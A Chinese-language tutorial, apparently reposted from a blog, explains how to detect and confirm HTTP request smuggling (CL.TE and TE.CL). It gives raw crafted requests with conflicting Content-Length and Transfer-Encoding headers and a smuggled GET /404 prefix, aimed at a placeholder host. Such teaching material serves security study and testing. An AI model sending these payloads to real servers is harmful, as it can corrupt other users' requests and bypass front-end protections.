标签：HTTP 请求 Host Content Length 走私 1.1

HTTP请求走私

要使用 Burp Repeater 发送此请求，首先需要进入 Repeater 菜单并确保未选中“Update Content-Length”选项。

使用计时技术查找 CL.TE 漏洞

如果应用程序容易受到请求走私的 CL.TE 变体的攻击，
那么发送如下请求通常会导致时间延迟：

POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 4

1
A
X

由于前端服务器使用 Content-Length标头，它将仅转发此请求的一部分，省略 X. 后端服务器使用 Transfer-Encodingheader，处理第一个块，然后等待下一个块到达。 这将导致可观察到的时间延迟。

使用计时技术查找 TE.CL 漏洞

如果应用程序容易受到请求走私的 TE.CL 变体的攻击，
那么发送如下请求通常会导致时间延迟：

POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 6

0

X

由于前端服务器使用 Transfer-Encoding标头，它将仅转发此请求的一部分，省略 X. 后端服务器使用 Content-Lengthheader，期望消息正文中有更多内容，并等待剩余内容到达。 这将导致可观察到的时间延迟。

确认 CL.TE 漏洞

可以发送如下攻击请求：

POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Transfer-Encoding: chunked

e
q=smuggling&x=
0

GET /404 HTTP/1.1
Foo: x

如果攻击成功，则后端服务器将此请求的最后两行视为属于接收到的下一个请求。 这将导致随后的“正常”请求如下所示：

GET /404 HTTP/1.1
Foo: xPOST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

q=smuggling

由于这个请求现在包含一个无效的 URL，服务器将响应状态码 404，表明攻击请求确实干扰了它。

确认 TE.CL 漏洞

可以发送如下攻击请求：

POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

x=
0

标签：HTTP,请求,Host,Content,Length,走私,1.1
来源： https://www.cnblogs.com/Icedisaster/p/15836745.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。